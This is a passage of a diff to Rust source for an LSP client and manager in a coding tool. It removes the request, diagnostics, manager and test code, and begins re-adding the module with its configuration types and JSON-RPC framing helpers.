anyhow::anyhow!( - "LSP request '{}' timed out (server: {})", - method, - self.server_name - ) - })? - .map_err(|_| { - anyhow::anyhow!( - "LSP request '{}' channel closed (server: {})", - method, - self.server_name - ) - })?; - - if let Some(err) = response.get("error") { - return Err(anyhow::anyhow!( - "LSP error from {}: {}", - self.server_name, - err - )); - } - Ok(response["result"].clone()) - } - - /// Send a JSON-RPC notification (fire-and-forget, no response expected). - async fn send_notification_inner( - &self, - method: &str, - params: serde_json::Value, - ) -> anyhow::Result<()> { - let msg = json!({ - "jsonrpc": "2.0", - "method": method, - "params": params, - }); - let body = serde_json::to_string(&msg)?; - let writer = self - .writer - .as_ref() - .ok_or_else(|| anyhow::anyhow!("LSP client already shut down"))?; - let mut w = writer.lock().await; - send_message(&mut w, &body).await - } - - /// Perform the LSP `initialize` / `initialized` handshake. - pub async fn initialize(&mut self, root_uri: &str) -> anyhow::Result<()> { - let params = json!({ - "processId": std::process::id(), - "clientInfo": { "name": "coven-code", "version": "1.0" }, - "rootUri": root_uri, - "capabilities": { - "textDocument": { - "publishDiagnostics": { - "relatedInformation": true, - "versionSupport": false, - "codeDescriptionSupport": false - }, - "synchronization": { - "dynamicRegistration": false, - "willSave": false, - "willSaveWaitUntil": false, - "didSave": true - } - }, - "workspace": { - "configuration": false, - "didChangeConfiguration": { "dynamicRegistration": false } - } - }, - "initializationOptions": self.server_config.initialization_options, - }); - - self.send_request_inner("initialize", params).await?; - - // Send the `initialized` notification to complete the handshake - self.send_notification_inner("initialized", json!({})).await?; - - self.is_initialized = true; - tracing::debug!("LSP server '{}' initialized", self.server_name); - Ok(()) - } - - /// Notify the server that a document has been opened. - pub async fn open_document( - &mut self, - uri: &str, - language_id: &str, - content: &str, - ) -> anyhow::Result<()> { - self.send_notification_inner( - "textDocument/didOpen", - json!({ - "textDocument": { - "uri": uri, - "languageId": language_id, - "version": 1, - "text": content, - } - }), - ) - .await - } - - /// Notify the server that a document has been changed. - pub async fn change_document( - &mut self, - uri: &str, - content: &str, - version: i64, - ) -> anyhow::Result<()> { - self.send_notification_inner( - "textDocument/didChange", - json!({ - "textDocument": { "uri": uri, "version": version }, - "contentChanges": [{ "text": content }], - }), - ) - .await - } - - /// Notify the server that a document has been saved. - pub async fn save_document(&mut self, uri: &str) -> anyhow::Result<()> { - self.send_notification_inner( - "textDocument/didSave", - json!({ "textDocument": { "uri": uri } }), - ) - .await - } - - /// Notify the server that a document has been closed. - pub async fn close_document(&mut self, uri: &str) -> anyhow::Result<()> { - self.send_notification_inner( - "textDocument/didClose", - json!({ "textDocument": { "uri": uri } }), - ) - .await - } - - /// Get hover information at a position (1-based line/column). - pub async fn hover( - &self, - uri: &str, - line: u32, - character: u32, - ) -> anyhow::Result> { - // LSP protocol is 0-based - let result = self - .send_request_inner( - "textDocument/hover", - json!({ - "textDocument": { "uri": uri }, - "position": { - "line": line.saturating_sub(1), - "character": character.saturating_sub(1), - } - }), - ) - .await?; - - if result.is_null() { - return Ok(None); - } - - // The result can be { contents: MarkupContent | MarkedString | MarkedString[] } - let contents = &result["contents"]; - let text = if let Some(value) = contents.get("value").and_then(|v| v.as_str()) { - // MarkupContent { kind, value } - value.to_string() - } else if let Some(s) = contents.as_str() { - // Plain string - s.to_string() - } else if let Some(arr) = contents.as_array() { - // Array of MarkedStrings - arr.iter() - .filter_map(|item| { - item.get("value") - .and_then(|v| v.as_str()) - .or_else(|| item.as_str()) - }) - .collect::>() - .join("\n\n") - } else { - return Ok(None); - }; - - if text.trim().is_empty() { - Ok(None) - } else { - Ok(Some(text)) - } - } - - /// Get definition locations for a position (1-based line/column). - /// Returns a list of `"file_path:line"` strings. - pub async fn definition( - &self, - uri: &str, - line: u32, - character: u32, - ) -> anyhow::Result> { - let result = self - .send_request_inner( - "textDocument/definition", - json!({ - "textDocument": { "uri": uri }, - "position": { - "line": line.saturating_sub(1), - "character": character.saturating_sub(1), - } - }), - ) - .await?; - - Ok(extract_locations(&result)) - } - - /// Get all references for a symbol at a position (1-based line/column). - pub async fn references( - &self, - uri: &str, - line: u32, - character: u32, - ) -> anyhow::Result> { - let result = self - .send_request_inner( - "textDocument/references", - json!({ - "textDocument": { "uri": uri }, - "position": { - "line": line.saturating_sub(1), - "character": character.saturating_sub(1), - }, - "context": { "includeDeclaration": true } - }), - ) - .await?; - - Ok(extract_locations(&result)) - } - - /// List document symbols for a file. - pub async fn document_symbols(&self, uri: &str) -> anyhow::Result> { - let result = self - .send_request_inner( - "textDocument/documentSymbol", - json!({ "textDocument": { "uri": uri } }), - ) - .await?; - - let mut symbols = Vec::new(); - match &result { - serde_json::Value::Array(arr) => { - for sym in arr { - collect_symbol(sym, 0, &mut symbols); - } - } - _ => {} - } - Ok(symbols) - } - - /// Get cached diagnostics for `file_path`. - pub fn get_diagnostics(&self, file_path: &str) -> Vec { - let uri = path_to_uri(file_path); - self.diagnostics - .get(&uri) - .map(|v| v.clone()) - .unwrap_or_default() - } - - /// Get all cached diagnostics across every file. - pub fn all_diagnostics(&self) -> Vec { - self.diagnostics - .iter() - .flat_map(|entry| entry.value().clone()) - .collect() - } - - /// Returns `true` if `initialize` has completed successfully. - pub fn is_initialized(&self) -> bool { - self.is_initialized - } - - /// Gracefully shut down the server. - pub async fn shutdown(&mut self) -> anyhow::Result<()> { - if !self.is_initialized { - return Ok(()); - } - // Attempt graceful shutdown; ignore errors since we kill anyway. - let _ = self.send_request_inner("shutdown", json!(null)).await; - let _ = self.send_notification_inner("exit", json!(null)).await; - - // Drop the writer so the pipe closes cleanly before we wait. - self.writer.take(); - - if let Some(mut child) = self.process.take() { - // Give the process a moment to exit cleanly. - let _ = tokio::time::timeout( - std::time::Duration::from_secs(5), - child.wait(), - ) - .await; - let _ = child.kill().await; - } - self.is_initialized = false; - Ok(()) - } -} - -// --------------------------------------------------------------------------- -// Incoming message dispatch -// --------------------------------------------------------------------------- - -fn dispatch_incoming( - msg: serde_json::Value, - pending: &PendingMap, - diagnostics: &Arc>>, - server_name: &str, -) { - // Response to a request we sent - if let Some(id) = msg.get("id").and_then(|v| v.as_u64()) { - if let Some((_, tx)) = pending.remove(&id) { - let _ = tx.send(msg); - } - return; - } - - // Notification or request from the server - if let Some(method) = msg.get("method").and_then(|v| v.as_str()) { - match method { - "textDocument/publishDiagnostics" => { - handle_publish_diagnostics( - &msg["params"], - diagnostics, - server_name, - ); - } - _ => { - tracing::trace!( - "LSP server {}: unhandled notification '{}'", - server_name, - method - ); - } - } - } -} - -fn handle_publish_diagnostics( - params: &serde_json::Value, - diagnostics: &Arc>>, - server_name: &str, -) { - let uri = match params.get("uri").and_then(|v| v.as_str()) { - Some(u) => u.to_string(), - None => return, - }; - - let raw_diags = match params.get("diagnostics").and_then(|v| v.as_array()) { - Some(d) => d, - None => { - diagnostics.insert(uri, Vec::new()); - return; - } - }; - - // Convert the URI back to a file path for storage - let file_path = uri_to_path(&uri); - - let parsed: Vec = raw_diags - .iter() - .filter_map(|d| parse_diagnostic(d, &file_path, server_name)) - .collect(); - - tracing::debug!( - "LSP server {}: {} diagnostics for {}", - server_name, - parsed.len(), - file_path - ); - - diagnostics.insert(uri, parsed); -} - -fn parse_diagnostic( - d: &serde_json::Value, - file_path: &str, - server_name: &str, -) -> Option { - let range = d.get("range")?; - let start = range.get("start")?; - let line = start.get("line")?.as_u64()? as u32 + 1; // LSP is 0-based - let column = start.get("character")?.as_u64()? as u32 + 1; - let message = d.get("message")?.as_str()?.to_string(); - - let severity = d - .get("severity") - .and_then(|v| v.as_u64()) - .map(DiagnosticSeverity::from_lsp_int) - .unwrap_or(DiagnosticSeverity::Error); - - let source = d - .get("source") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - .or_else(|| Some(server_name.to_string())); - - let code = d.get("code").map(|v| match v { - serde_json::Value::String(s) => s.clone(), - serde_json::Value::Number(n) => n.to_string(), - other => other.to_string(), - }); - - Some(LspDiagnostic { - file: file_path.to_string(), - line, - column, - severity, - message, - source, - code, - }) -} - -// --------------------------------------------------------------------------- -// Location / symbol helpers -// --------------------------------------------------------------------------- - -/// Extract a list of `"path:line"` strings from an LSP `Location | Location[]` result. -fn extract_locations(result: &serde_json::Value) -> Vec { - let items: Vec<&serde_json::Value> = if let Some(arr) = result.as_array() { - arr.iter().collect() - } else if result.is_object() { - vec![result] - } else { - return Vec::new(); - }; - - items - .into_iter() - .filter_map(|loc| { - let uri = loc.get("uri")?.as_str()?; - let line = loc - .pointer("/range/start/line") - .and_then(|v| v.as_u64()) - .unwrap_or(0) - + 1; // convert to 1-based - let col = loc - .pointer("/range/start/character") - .and_then(|v| v.as_u64()) - .unwrap_or(0) - + 1; - let path = uri_to_path(uri); - Some(format!("{}:{}:{}", path, line, col)) - }) - .collect() -} - -/// Recursively collect symbol names from a DocumentSymbol or SymbolInformation node. -fn collect_symbol(sym: &serde_json::Value, depth: usize, out: &mut Vec) { - let indent = " ".repeat(depth); - let name = sym - .get("name") - .and_then(|n| n.as_str()) - .unwrap_or(""); - let kind = sym - .get("kind") - .and_then(|k| k.as_u64()) - .unwrap_or(0); - let kind_str = symbol_kind_name(kind); - out.push(format!("{}{} ({})", indent, name, kind_str)); - - // DocumentSymbol may have nested children - if let Some(children) = sym.get("children").and_then(|c| c.as_array()) { - for child in children { - collect_symbol(child, depth + 1, out); - } - } -} - -fn symbol_kind_name(kind: u64) -> &'static str { - match kind { - 1 => "file", - 2 => "module", - 3 => "namespace", - 4 => "package", - 5 => "class", - 6 => "method", - 7 => "property", - 8 => "field", - 9 => "constructor", - 10 => "enum", - 11 => "interface", - 12 => "function", - 13 => "variable", - 14 => "constant", - 15 => "string", - 16 => "number", - 17 => "boolean", - 18 => "array", - 19 => "object", - 20 => "key", - 21 => "null", - 22 => "enum-member", - 23 => "struct", - 24 => "event", - 25 => "operator", - 26 => "type-parameter", - _ => "symbol", - } -} - -// --------------------------------------------------------------------------- -// URI helpers -// --------------------------------------------------------------------------- - -fn path_to_uri(path: &str) -> String { - // Simple heuristic; for full correctness callers should pass pre-formed URIs - if path.starts_with("file://") { - return path.to_string(); - } - let canonical = std::fs::canonicalize(path) - .unwrap_or_else(|_| std::path::PathBuf::from(path)); - let s = canonical.to_string_lossy(); - if cfg!(target_os = "windows") { - // Drive letters need a leading slash: file:///C:/... - format!("file:///{}", s.replace('\\', "/")) - } else { - format!("file://{}", s) - } -} - -fn uri_to_path(uri: &str) -> String { - let stripped = uri - .strip_prefix("file:///") - .or_else(|| uri.strip_prefix("file://")) - .unwrap_or(uri); - if cfg!(target_os = "windows") { - stripped.replace('/', "\\") - } else { - stripped.to_string() - } -} - -// --------------------------------------------------------------------------- -// Diagnostic formatting (shared utility) -// --------------------------------------------------------------------------- - -impl LspManager { - /// Format a slice of diagnostics into a human-readable multi-line string - /// suitable for inclusion in tool output or TUI display. - pub fn format_diagnostics(diagnostics: &[LspDiagnostic]) -> String { - if diagnostics.is_empty() { - return "No diagnostics.".to_string(); - } - diagnostics - .iter() - .map(|d| { - format!( - "[{}] {}:{}:{} - {}{}{}", - d.severity.as_str().to_uppercase(), - d.file, - d.line, - d.column, - d.message, - d.source - .as_deref() - .map(|s| format!(" ({})", s)) - .unwrap_or_default(), - d.code - .as_deref() - .map(|c| format!(" [{}]", c)) - .unwrap_or_default(), - ) - }) - .collect::>() - .join("\n") - } -} - -// --------------------------------------------------------------------------- -// LspManager — registry and multi-server coordination -// --------------------------------------------------------------------------- - -/// Manages a collection of [`LspClient`] instances, routing file operations -/// to the correct server based on extension mappings. -pub struct LspManager { - /// Registered configs (used for lookup before a client is started) - configs: Vec, - /// Running clients keyed by server name - clients: HashMap, - /// Map of file extension → list of server names that handle it - extension_map: HashMap>, - /// Set of file URIs that have been opened on a specific server (URI → server name) - opened_files: HashMap, -} - -impl LspManager { - pub fn new() -> Self { - Self { - configs: Vec::new(), - clients: HashMap::new(), - extension_map: HashMap::new(), - opened_files: HashMap::new(), - } - } - - /// Register an LSP server configuration. - pub fn register_server(&mut self, config: LspServerConfig) { - // Build extension → server mapping - for ext in config.extension_to_language.keys() { - let normalized = ext.to_lowercase(); - self.extension_map - .entry(normalized) - .or_default() - .push(config.name.clone()); - } - // Also handle glob patterns like "*.rs" → ".rs" - for pattern in &config.file_patterns { - if let Some(ext) = pattern.strip_prefix("*.") { - let normalized = format!(".{}", ext.to_lowercase()); - let entry = self.extension_map.entry(normalized).or_default(); - if !entry.contains(&config.name) { - entry.push(config.name.clone()); - } - } - } - self.configs.push(config); - } - - /// Return all registered server configurations. - pub fn servers(&self) -> &[LspServerConfig] { - &self.configs - } - - /// Look up a server configuration by name. - pub fn server_by_name(&self, name: &str) -> Option<&LspServerConfig> { - self.configs.iter().find(|s| s.name == name) - } - - /// Public wrapper: find the first server name that handles `file_path` based on extension. - /// Returns `None` when no server is configured for the file's extension. - pub fn server_name_for_file_pub(&self, file_path: &str) -> Option<&str> { - self.server_name_for_file(file_path) - } - - /// Find the first server name that handles `file_path` based on extension. - fn server_name_for_file(&self, file_path: &str) -> Option<&str> { - let ext = Path::new(file_path) - .extension() - .and_then(|e| e.to_str()) - .map(|e| format!(".{}", e.to_lowercase())) - .unwrap_or_default(); - self.extension_map - .get(&ext) - .and_then(|names| names.first()) - .map(|s| s.as_str()) - } - - /// Spawn and initialize the server for `file_path` if it is not already - /// running. Returns `None` when no server is configured for this file type. - async fn ensure_started( - &mut self, - file_path: &str, - root_dir: &Path, - ) -> anyhow::Result> { - let server_name = match self.server_name_for_file(file_path) { - Some(n) => n.to_string(), - None => return Ok(None), - }; - - if !self.clients.contains_key(&server_name) { - let config = match self.configs.iter().find(|c| c.name == server_name) { - Some(c) => c.clone(), - None => return Ok(None), - }; - match LspClient::start(config).await { - Ok(mut client) => { - let root_uri = path_to_uri(&root_dir.to_string_lossy()); - if let Err(e) = client.initialize(&root_uri).await { - tracing::warn!( - "Failed to initialize LSP server '{}': {}", - server_name, - e - ); - // Don't insert — allow retry on next call - return Ok(None); - } - self.clients.insert(server_name.clone(), client); - } - Err(e) => { - tracing::warn!( - "Failed to start LSP server '{}': {}", - server_name, - e - ); - return Ok(None); - } - } - } - - Ok(self.clients.get_mut(&server_name)) - } - - /// Spawn and initialize servers for all registered configurations. - pub async fn start_servers(&mut self, root_dir: &Path) { - let configs: Vec = self.configs.clone(); - for config in configs { - let name = config.name.clone(); - if self.clients.contains_key(&name) { - continue; - } - match LspClient::start(config).await { - Ok(mut client) => { - let root_uri = path_to_uri(&root_dir.to_string_lossy()); - if let Err(e) = client.initialize(&root_uri).await { - tracing::warn!( - "Failed to initialize LSP server '{}': {}", - name, - e - ); - continue; - } - self.clients.insert(name.clone(), client); - tracing::info!("LSP server '{}' started", name); - } - Err(e) => { - tracing::warn!("Failed to start LSP server '{}': {}", name, e); - } - } - } - } - - /// Open a file on the appropriate LSP server. - pub async fn open_file( - &mut self, - file_path: &str, - root_dir: &Path, - ) -> anyhow::Result<()> { - let uri = path_to_uri(file_path); - let server_name = match self.server_name_for_file(file_path) { - Some(n) => n.to_string(), - None => return Ok(()), - }; - - // Skip if already opened on this server - if self.opened_files.get(&uri).map(|s| s.as_str()) == Some(server_name.as_str()) { - return Ok(()); - } - - let content = match tokio::fs::read_to_string(file_path).await { - Ok(c) => c, - Err(e) => { - return Err(anyhow::anyhow!( - "Cannot read '{}' for LSP: {}", - file_path, - e - )) - } - }; - - // Ensure the server is running first (borrows self mutably, so must - // finish before we borrow opened_files). - self.ensure_started(file_path, root_dir).await?; - - if let Some(client) = self.clients.get_mut(&server_name) { - let lang = client.server_config.language_for_file(file_path); - client.open_document(&uri, &lang, &content).await?; - self.opened_files.insert(uri, server_name); - } - Ok(()) - } - - /// Register all servers from a config slice if not already registered. - /// Idempotent: servers already present by name are skipped. - pub fn seed_from_config(&mut self, configs: &[LspServerConfig]) { - for cfg in configs { - if !self.configs.iter().any(|c| c.name == cfg.name) { - self.register_server(cfg.clone()); - } - } - } - - /// Get hover information for `file_path` at the given 1-based position. - pub async fn hover( - &mut self, - file_path: &str, - root_dir: &Path, - line: u32, - character: u32, - ) -> anyhow::Result> { - let uri = path_to_uri(file_path); - let server_name = self - .server_name_for_file(file_path) - .ok_or_else(|| { - anyhow::anyhow!("No LSP server configured for '{}'", file_path) - })? - .to_string(); - self.ensure_started(file_path, root_dir).await?; - let client = self - .clients - .get(&server_name) - .ok_or_else(|| anyhow::anyhow!("LSP server '{}' not running", server_name))?; - client.hover(&uri, line, character).await - } - - /// Get definition locations for `file_path` at the given 1-based position. - pub async fn definition( - &mut self, - file_path: &str, - root_dir: &Path, - line: u32, - character: u32, - ) -> anyhow::Result> { - let uri = path_to_uri(file_path); - let server_name = self - .server_name_for_file(file_path) - .ok_or_else(|| { - anyhow::anyhow!("No LSP server configured for '{}'", file_path) - })? - .to_string(); - self.ensure_started(file_path, root_dir).await?; - let client = self - .clients - .get(&server_name) - .ok_or_else(|| anyhow::anyhow!("LSP server '{}' not running", server_name))?; - client.definition(&uri, line, character).await - } - - /// Get references for a symbol in `file_path` at the given 1-based position. - pub async fn references( - &mut self, - file_path: &str, - root_dir: &Path, - line: u32, - character: u32, - ) -> anyhow::Result> { - let uri = path_to_uri(file_path); - let server_name = self - .server_name_for_file(file_path) - .ok_or_else(|| { - anyhow::anyhow!("No LSP server configured for '{}'", file_path) - })? - .to_string(); - self.ensure_started(file_path, root_dir).await?; - let client = self - .clients - .get(&server_name) - .ok_or_else(|| anyhow::anyhow!("LSP server '{}' not running", server_name))?; - client.references(&uri, line, character).await - } - - /// List document symbols for `file_path`. - pub async fn document_symbols( - &mut self, - file_path: &str, - root_dir: &Path, - ) -> anyhow::Result> { - let uri = path_to_uri(file_path); - let server_name = self - .server_name_for_file(file_path) - .ok_or_else(|| { - anyhow::anyhow!("No LSP server configured for '{}'", file_path) - })? - .to_string(); - self.ensure_started(file_path, root_dir).await?; - let client = self - .clients - .get(&server_name) - .ok_or_else(|| anyhow::anyhow!("LSP server '{}' not running", server_name))?; - client.document_symbols(&uri).await - } - - /// Get cached diagnostics for `file_path` across all running servers. - pub fn get_diagnostics_for_file(&self, file_path: &str) -> Vec { - self.clients - .values() - .flat_map(|c| c.get_diagnostics(file_path)) - .collect() - } - - /// Get all cached diagnostics from all running servers. - pub fn all_diagnostics(&self) -> Vec { - self.clients - .values() - .flat_map(|c| c.all_diagnostics()) - .collect() - } - - /// Shut down all running servers. - pub async fn shutdown_all(&mut self) { - let names: Vec = self.clients.keys().cloned().collect(); - for name in names { - if let Some(mut client) = self.clients.remove(&name) { - if let Err(e) = client.shutdown().await { - tracing::warn!("Error shutting down LSP server '{}': {}", name, e); - } - } - } - self.opened_files.clear(); - } - - /// Get a legacy-compatible async diagnostic query (returns cached results). - pub async fn get_diagnostics(&self, file: &str) -> Vec { - self.get_diagnostics_for_file(file) - } -} - -impl Default for LspManager { - fn default() -> Self { - Self::new() - } -} - -// --------------------------------------------------------------------------- -// Global singleton -// --------------------------------------------------------------------------- - -use once_cell::sync::Lazy; - -static GLOBAL_LSP_MANAGER: Lazy>> = - Lazy::new(|| Arc::new(tokio::sync::Mutex::new(LspManager::new()))); - -/// Access the global [`LspManager`] instance. -pub fn global_lsp_manager() -> Arc> { - GLOBAL_LSP_MANAGER.clone() -} - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - - fn make_config(name: &str) -> LspServerConfig { - LspServerConfig { - name: name.to_string(), - command: name.to_string(), - args: vec![], - file_patterns: vec!["*.rs".to_string()], - initialization_options: None, - extension_to_language: { - let mut m = HashMap::new(); - m.insert(".rs".to_string(), "rust".to_string()); - m - }, - env: HashMap::new(), - } - } - - fn make_diagnostic( - file: &str, - line: u32, - col: u32, - severity: DiagnosticSeverity, - message: &str, - ) -> LspDiagnostic { - LspDiagnostic { - file: file.to_string(), - line, - column: col, - severity, - message: message.to_string(), - source: None, - code: None, - } - } - - #[test] - fn test_new_manager_empty() { - let mgr = LspManager::new(); - assert!(mgr.servers().is_empty()); - } - - #[test] - fn test_register_server() { - let mut mgr = LspManager::new(); - mgr.register_server(make_config("rust-analyzer")); - assert_eq!(mgr.servers().len(), 1); - assert_eq!(mgr.servers()[0].name, "rust-analyzer"); - } - - #[test] - fn test_register_multiple_servers() { - let mut mgr = LspManager::new(); - mgr.register_server(make_config("rust-analyzer")); - mgr.register_server(make_config("pyright")); - assert_eq!(mgr.servers().len(), 2); - } - - #[test] - fn test_server_by_name_found() { - let mut mgr = LspManager::new(); - mgr.register_server(make_config("rust-analyzer")); - mgr.register_server(make_config("pyright")); - let s = mgr.server_by_name("pyright"); - assert!(s.is_some()); - assert_eq!(s.unwrap().name, "pyright"); - } - - #[test] - fn test_server_by_name_not_found() { - let mgr = LspManager::new(); - assert!(mgr.server_by_name("missing").is_none()); - } - - #[tokio::test] - async fn test_get_diagnostics_empty_when_no_servers() { - let mgr = LspManager::new(); - let diags = mgr.get_diagnostics("src/main.rs").await; - assert!(diags.is_empty()); - } - - #[test] - fn test_format_diagnostics_empty() { - let result = LspManager::format_diagnostics(&[]); - assert_eq!(result, "No diagnostics."); - } - - #[test] - fn test_format_diagnostics_single_error() { - let diags = vec![make_diagnostic( - "src/lib.rs", - 10, - 5, - DiagnosticSeverity::Error, - "type mismatch", - )]; - let result = LspManager::format_diagnostics(&diags); - assert!(result.contains("[ERROR]")); - assert!(result.contains("src/lib.rs")); - assert!(result.contains("10:5")); - assert!(result.contains("type mismatch")); - } - - #[test] - fn test_format_diagnostics_multiple() { - let diags = vec![ - make_diagnostic("a.rs", 1, 1, DiagnosticSeverity::Error, "err1"), - make_diagnostic("b.rs", 2, 3, DiagnosticSeverity::Warning, "warn1"), - ]; - let result = LspManager::format_diagnostics(&diags); - let lines: Vec<&str> = result.lines().collect(); - assert_eq!(lines.len(), 2); - assert!(lines[0].contains("[ERROR]")); - assert!(lines[1].contains("[WARNING]")); - } - - #[test] - fn test_format_diagnostics_with_source_and_code() { - let mut d = make_diagnostic( - "main.rs", - 5, - 1, - DiagnosticSeverity::Error, - "mismatched types", - ); - d.source = Some("rust-analyzer".to_string()); - d.code = Some("E0308".to_string()); - let result = LspManager::format_diagnostics(&[d]); - assert!(result.contains("(rust-analyzer)"), "result = {}", result); - assert!(result.contains("[E0308]"), "result = {}", result); - } - - #[test] - fn test_diagnostic_severity_ordering() { - assert!(DiagnosticSeverity::Error < DiagnosticSeverity::Warning); - assert!(DiagnosticSeverity::Warning < DiagnosticSeverity::Information); - assert!(DiagnosticSeverity::Information < DiagnosticSeverity::Hint); - } - - #[test] - fn test_diagnostic_severity_as_str() { - assert_eq!(DiagnosticSeverity::Error.as_str(), "error"); - assert_eq!(DiagnosticSeverity::Warning.as_str(), "warning"); - assert_eq!(DiagnosticSeverity::Information.as_str(), "info"); - assert_eq!(DiagnosticSeverity::Hint.as_str(), "hint"); - } - - #[test] - fn test_lsp_server_config_serialization() { - let cfg = make_config("rust-analyzer"); - let json = serde_json::to_string(&cfg).unwrap(); - let back: LspServerConfig = serde_json::from_str(&json).unwrap(); - assert_eq!(back.name, "rust-analyzer"); - } - - #[test] - fn test_default_trait() { - let mgr = LspManager::default(); - assert!(mgr.servers().is_empty()); - } - - #[test] - fn test_extension_routing() { - let mut mgr = LspManager::new(); - mgr.register_server(make_config("rust-analyzer")); - // .rs maps to rust-analyzer - assert_eq!( - mgr.server_name_for_file("src/main.rs"), - Some("rust-analyzer") - ); - // .py has no mapping - assert_eq!(mgr.server_name_for_file("app.py"), None); - } - - #[test] - fn test_path_to_uri_roundtrip() { - // On the current platform, converting a relative path to URI and back - // should not panic. - let uri = path_to_uri("src/main.rs"); - assert!( - uri.starts_with("file://"), - "expected file:// URI, got {}", - uri - ); - let _back = uri_to_path(&uri); - } - - #[test] - fn test_language_for_file() { - let cfg = make_config("rust-analyzer"); - assert_eq!(cfg.language_for_file("src/main.rs"), "rust"); - assert_eq!(cfg.language_for_file("README.md"), "plaintext"); - } - - #[test] - fn test_severity_from_lsp_int() { - assert_eq!(DiagnosticSeverity::from_lsp_int(1), DiagnosticSeverity::Error); - assert_eq!(DiagnosticSeverity::from_lsp_int(2), DiagnosticSeverity::Warning); - assert_eq!(DiagnosticSeverity::from_lsp_int(3), DiagnosticSeverity::Information); - assert_eq!(DiagnosticSeverity::from_lsp_int(4), DiagnosticSeverity::Hint); - assert_eq!(DiagnosticSeverity::from_lsp_int(99), DiagnosticSeverity::Hint); - } - - #[test] - fn test_global_lsp_manager_consistent() { - let m1 = global_lsp_manager(); - let m2 = global_lsp_manager(); - assert!(Arc::ptr_eq(&m1, &m2)); - } - - #[test] - fn test_parse_diagnostic_valid() { - let raw = serde_json::json!({ - "range": { - "start": { "line": 4, "character": 2 }, - "end": { "line": 4, "character": 10 } - }, - "severity": 1, - "message": "type mismatch", - "source": "rust-analyzer", - "code": "E0308" - }); - let d = parse_diagnostic(&raw, "src/main.rs", "rust-analyzer").unwrap(); - assert_eq!(d.line, 5); // 0-based → 1-based - assert_eq!(d.column, 3); - assert_eq!(d.message, "type mismatch"); - assert_eq!(d.severity, DiagnosticSeverity::Error); - assert_eq!(d.code.as_deref(), Some("E0308")); - } - - #[test] - fn test_parse_diagnostic_missing_range_returns_none() { - let raw = serde_json::json!({ "message": "oops" }); - assert!(parse_diagnostic(&raw, "f.rs", "lsp").is_none()); - } -} +//! Language Server Protocol client. +//! +//! Implements the client side of the LSP JSON-RPC protocol over the LSP +//! server's stdin/stdout. Each [`LspClient`] manages one server process; +//! [`LspManager`] tracks a collection of clients keyed by server name. +//! +//! # Protocol overview +//! Messages are framed with a `Content-Length` HTTP-style header: +//! ```text +//! Content-Length: \r\n +//! \r\n +//! +//! ``` +//! The server sends the same framing back on its stdout. + +use dashmap::DashMap; +use serde::{Deserialize, Serialize}; +use serde_json::json; +use std::collections::HashMap; +use std::path::Path; +use std::sync::{ + atomic::{AtomicU64, Ordering}, + Arc, +}; +use tokio::io::{AsyncBufReadExt, AsyncReadExt, AsyncWriteExt, BufReader, BufWriter}; +use tokio::process::{Child, ChildStdin, ChildStdout, Command}; +use tokio::sync::{oneshot, Mutex}; + +// --------------------------------------------------------------------------- +// Configuration +// --------------------------------------------------------------------------- + +/// Configuration for a single LSP server process. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct LspServerConfig { + /// Display name, e.g. "rust-analyzer" + pub name: String, + /// Path or name of the server binary, e.g. "rust-analyzer" + pub command: String, + /// Command-line arguments passed to the server binary + pub args: Vec, + /// Glob patterns that activate this server, e.g. `["*.rs", "*.toml"]` + pub file_patterns: Vec, + /// Optional server-specific initialization options (passed in LSP `initialize`) + pub initialization_options: Option, + /// Map of file extension (e.g. `.rs`) to LSP language identifier (e.g. + /// `rust`). Used to supply `textDocument/didOpen::languageId` and to + /// route files to the right server. + #[serde(default)] + pub extension_to_language: HashMap, + /// Optional extra environment variables for the server process. + #[serde(default)] + pub env: HashMap, +} + +impl LspServerConfig { + /// Look up the LSP language identifier for `file_path`, falling back to + /// `"plaintext"` when the extension is not mapped. + pub fn language_for_file(&self, file_path: &str) -> String { + let ext = Path::new(file_path) + .extension() + .and_then(|e| e.to_str()) + .map(|e| format!(".{}", e.to_lowercase())) + .unwrap_or_default(); + self.extension_to_language + .get(&ext) + .cloned() + .unwrap_or_else(|| "plaintext".to_string()) + } +} + +// --------------------------------------------------------------------------- +// Diagnostics +// --------------------------------------------------------------------------- + +/// A single diagnostic emitted by an LSP server. +#[derive(Debug, Clone)] +pub struct LspDiagnostic { + /// Workspace-relative or absolute file path + pub file: String, + /// 1-based line number + pub line: u32, + /// 1-based column number + pub column: u32, + pub severity: DiagnosticSeverity, + pub message: String, + /// The LSP server that produced this diagnostic (e.g. "rust-analyzer") + pub source: Option, + /// Diagnostic code (e.g. "E0308"), if provided by the server + pub code: Option, +} + +/// Severity level of a diagnostic, matching the LSP spec. +#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)] +pub enum DiagnosticSeverity { + Error = 1, + Warning = 2, + Information = 3, + Hint = 4, +} + +impl DiagnosticSeverity { + pub fn as_str(&self) -> &'static str { + match self { + Self::Error => "error", + Self::Warning => "warning", + Self::Information => "info", + Self::Hint => "hint", + } + } + + fn from_lsp_int(n: u64) -> Self { + match n { + 1 => Self::Error, + 2 => Self::Warning, + 3 => Self::Information, + _ => Self::Hint, + } + } +} + +// --------------------------------------------------------------------------- +// JSON-RPC framing helpers +// --------------------------------------------------------------------------- + +async fn send_message(writer: &mut BufWriter, body: &str) -> anyhow::Result<()> { + let header = format!("Content-Length: {}\r\n\r\n", body.len()); + writer.write_all(header.as_bytes()).await?; + writer.write_all(body.as_bytes()).await?; + writer.flush().await?; + Ok(()) +} + +async fn read_message(reader: &mut BufReader) -> anyhow::Result { + let mut content_length: usize = 0; + loop { + let mut line = String::new(); + let n = reader.read_line(&mut line).await?; + if n == 0 { + return Err(anyhow::anyhow!("LSP server closed stdout")); + } + let trimmed = line.trim_end_matches(['\r', '\n']); + if trimmed.is_empty() { + break; + } + if let Some(val) = trimmed.strip_prefix("Content-Length: ") { + content_length = val.trim().parse()?; + } + } + if content_length == 0 { + return Err(anyhow::anyhow!("LSP message missing Content-Length header")); + } + let mut buf = vec![0u8; content_length]; + reader.read_exact(&mut buf).await?; + Ok(serde_json::from_slice(&buf)?) +} + +// --------------------------------------------------------------------------- +// LspClient +// --------------------------------------------------------------------------- + +type PendingMap = Arc>>; + +/// A running LSP client connected to a single server process. +pub struct LspClient { + pub server_name: String, + pub server_config: LspServerConfig, + /// The child process handle; `None` after shutdown. + process: Option, + request_id: Arc, + pending: PendingMap, + /// Diagnostics indexed by URI. + pub diagnostics: Arc>>, + is_initialized: bool, + /// Shared writer — 